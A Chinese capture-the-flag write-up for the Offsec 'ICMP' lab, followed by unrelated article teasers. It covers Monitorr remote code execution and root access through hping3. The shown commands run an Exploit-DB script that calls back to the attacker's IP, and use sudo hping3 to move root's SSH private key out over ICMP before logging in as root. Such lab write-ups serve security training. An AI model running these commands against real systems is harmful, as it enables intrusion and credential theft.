[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升

news2024/11/26 12:42:43

信息收集

IP AddressOpening Ports
192.168.52.218TCP:22,80

$ nmap -p- 192.168.52.218 --min-rate 1000 -sC -sV -Pn

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
|   256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_  256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-title:             Monitorr            | Monitorr        
|_Requested resource was http://192.168.52.218/mon/
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Monitorr-RCE

image.png

$ searchsploit Monitorr -w

image-1.png

http://192.168.52.218/mon/assets/php/upload.php

image-2.png

$ python3 /usr/share/exploitdb/exploits/php/webapps/48980.py http://192.168.52.218/mon 192.168.49.52 10077

image-3.png

fox目录下存在Local.txt

Local.txt

4d2ed33d3467974721246fd088ec495c

www-data -> fox

www-data@icmp:/home/fox$ cat reminder

image-4.png

www-data@icmp:/home/fox$ cat ./devel/crypt.php

image-5.png

BUHNIJMONIBUVCYTTYVGBUHJNI

image-6.png

权限提升-hping3

$ sudo -l

image-7.png

https://gtfobins.github.io/gtfobins/hping3/

image-9.png

如果你尝试在kali上运行可能会触发内存锁定警告,所以保险的方法就是监听和执行应均在靶机上执行…

$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe

$ sudo hping3 --icmp 127.0.0.1 --sign signature --file /root/.ssh/id_rsa -d 4000 -c 2

image-8.png

$ chmod 600 id_rsa

$ ssh -i ./id_rsa root@192.168.58.218

image-10.png

proof.txt

407e47c8f6e703f101254a04448f1014

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2187494.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Kubernetes-Kind篇-01-kind搭建测试集群

Kubernetes-Kind篇-01-kind搭建测试集群

1、Kind 介绍 官方文档地址:https://kind.sigs.k8s.io/ github仓库地址:https://github.com/kubernetes-sigs/kind 国内镜像仓库地址:https://gitcode.com/gh_mirrors/ki/kind/overview kind 是一种使用 Docker 容器 nodes 运行本地 Kubern…
阅读更多...
算法日记-链表翻转

算法日记-链表翻转

文章目录 场景:解法一:迭代步骤完整代码 解法二:递归步骤完整代码 重温力扣常规算法,记录算法的演变,今天介绍的是链表翻转 场景: 现在有一条单项链表,链表节点存在一个数据和指向下一个节点的…
阅读更多...
MySQL--三大范式(超详解)

MySQL--三大范式(超详解)

目录 一、前言二、三大范式2.1概念2.2第一范式(1NF)2.3第二范式(2NF)2.3第三范式(3NF) 一、前言 欢迎大家来到权权的博客~欢迎大家对我的博客进行指导,有什么不对的地方,我会及时改进…
阅读更多...
AI不可尽信

AI不可尽信

看到某项目有类似这样的一段代码 leaves : make([]int, 10) leaves leaves[:0]没理解这样的连续两行,有何作用? 初始化一个长度和容量都为10的切片,接着把切片长度设置为0 即如下demo: (在线地址) package mainimport "fmt"func main() {leaves : make([]int, 1…
阅读更多...
【2023工业3D异常检测文献】CPMF: 基于手工制作PCD描述符和深度学习IAD结合的AD方法

【2023工业3D异常检测文献】CPMF: 基于手工制作PCD描述符和深度学习IAD结合的AD方法

Complementary Pseudo Multimodal Feature for Point Cloud Anomaly Detection 1、Background 早期的点云异常检测(PCD)表示是手工制作的,依赖于启发式设计。随着深度学习的发展,最近的方法采用了基于学习的PCD特征。尽管与基线相比有相当大的改进&…
阅读更多...
欧几里得算法--(密码学基础)

欧几里得算法--(密码学基础)

根基:gcd(a,b)gcd(b,a mod b) 先举个例子吧,gcd(16,6)gcd(6,4)gcd(4,2)gcd(2,0)2 学习这个定理的时候我想了几个问题. 第一个问题:为什么求出的就一定是他们两个数的公约数? 这个问题很简单我们只需要通过几何来计较即可&#x…
阅读更多...
MyBatis——ORM

MyBatis——ORM

MyBatis——ORM 验证映射配置ResultType本质是ResultMap具体的转换逻辑 概括的说,MyBatis中,对于映射关系的声明是由开发者在xml文件手动完成的。比如对查询方法而言,你需要显式声明ResultType或ResultMap,这里其实就是在定义数据…
阅读更多...
Java JUC(三) AQS与同步工具详解

Java JUC(三) AQS与同步工具详解

Java JUC(三) AQS与同步工具详解 一. ReentrantLock 概述 ReentrantLock 是 java.util.concurrent.locks 包下的一个同步工具类,它实现了 Lock 接口,提供了一种相比synchronized关键字更灵活的锁机制。ReentrantLock 是一种独占…
阅读更多...
【Kubernetes】常见面试题汇总(五十三)

【Kubernetes】常见面试题汇总(五十三)

目录 118. pod 状态为 ErrlmagePull ? 119.探测存活 pod 状态为 CrashLoopBackOff ? 特别说明: 题目 1-68 属于【Kubernetes】的常规概念题,即 “ 汇总(一)~(二十二)” 。…
阅读更多...
uniapp使用字体图标 ttf svg作为选项图标,还支持变色变图按

uniapp使用字体图标 ttf svg作为选项图标,还支持变色变图按

在staic目录下有一些ttf文件,如uni.ttf,iconfont.ttf 这些文件中保存这字体svg的源码们,我们也可以在网上找其他的。这些就是我们要显示的突图标的 显示来源。这样不用使用png图标,选中不选中还得用两个图片 我的具体使用如下 &q…
阅读更多...
Python入门--循环语句

Python入门--循环语句

目录 1. while循环基础语法 2. while循环的嵌套 3. while实现九九乘法表 4. for循环基础语法 5. for循环的嵌套 6. for循环实现九九乘法表 7. 循环中断:break和continue 循环普遍存在于日常生活中,同样,在程序中,循环功能也…
阅读更多...
thinkphp6入门(25)-- 分组查询 GROUP_CONCAT

thinkphp6入门(25)-- 分组查询 GROUP_CONCAT

假设表名为 user_courses,字段为 user_id 和 course_name,存储每个用户选修的课程,想查询每个学生选修的所有课程 SQL 原生查询 SELECT user_id, GROUP_CONCAT(course_name) as courses FROM user_courses GROUP BY user_id; ThinkPHP 代码…
阅读更多...
python常用库总结(argparse、re、matlpotlab.plot)

python常用库总结(argparse、re、matlpotlab.plot)

文章目录 1.argparse库字符串(str)布尔值(bool)选择(choices)计数(count)常量(store_const 和 store_true)多个值(nargs)可选参数&…
阅读更多...
用Python实现运筹学——Day 9: 线性规划的灵敏度分析

用Python实现运筹学——Day 9: 线性规划的灵敏度分析

一、学习内容 1. 灵敏度分析的定义与作用 灵敏度分析(Sensitivity Analysis) 是在优化问题中,分析模型参数变化对最优解及目标函数值的影响。它帮助我们了解在线性规划模型中,当某些参数(如资源供应量、成本系数等&a…
阅读更多...
SQLServer CXPACKET等待事件

SQLServer CXPACKET等待事件

文章目录 SQL Server 中的 CXPACKET 等待类型是最容易被误解的等待统计之一。CXPACKET 这个术语来源于 “Class Exchange Packet”(类交换包)。其本质可以描述为在单个进程的两个并行线程之间交换数据行的过程。其中一个线程是“生产者线程”&#xff0c…
阅读更多...
理解Matplotlib构图组成

理解Matplotlib构图组成

介绍 Matplotlib 是 Python 中最流行的数据可视化库之一。它提供了一系列丰富的工具,可以绘制高度自定义且适用于各种应用场景的图表。无论你是数据科学家、工程师,还是需要处理数据图形表示的任何人,理解如何操作和定制 Matplotlib 中的图表…
阅读更多...
ElasticSearch 备考 -- 备份和恢复

ElasticSearch 备考 -- 备份和恢复

一、题目 备份集群下的索引 task,存储快照名称为 snapshot_1 二、思考 这个涉及的是集群的备份,主要是通过创建快照,涉及到以下2步骤 Setp1:注册一个备份 snapshot repository Setp2:创建 snapshot 可以通过两种方…
阅读更多...
Ubuntu18.04安装cuda11.1(出现c++版本问题)

Ubuntu18.04安装cuda11.1(出现c++版本问题)

一、概述 需要使用到ubuntu18.04进行cuda的配置,最新版本的cuda跟pytorch的版本不太适配,所以为了能够复现,我选择了一些老版本的cuda11,其使用的范围更加广泛。将自己 二、具体操作 (一)安装流程 1.官网…
阅读更多...
为什么疾风气象大模型比传统天气预报更准?

为什么疾风气象大模型比传统天气预报更准?

近年来,气象大模型逐渐成为天气预报的核心工具,其预测精度和可靠性远超传统天气预报方法。本文将探讨气象大模型为何比传统天气预报更加准确的原因,分析其优势以及在气象预测领域的应用前景。 1. 传统天气预报的局限性 传统天气预报通常依赖…
阅读更多...
win11/win10/windows下快安装并使用git

win11/win10/windows下快安装并使用git

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、Git 的特点?二、GIT安装方法1.打开GIT官网2.下载git安装程序整个安装过程基本上直接用默认选项就可以 总结 前言 提示:GIT介绍 GI…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023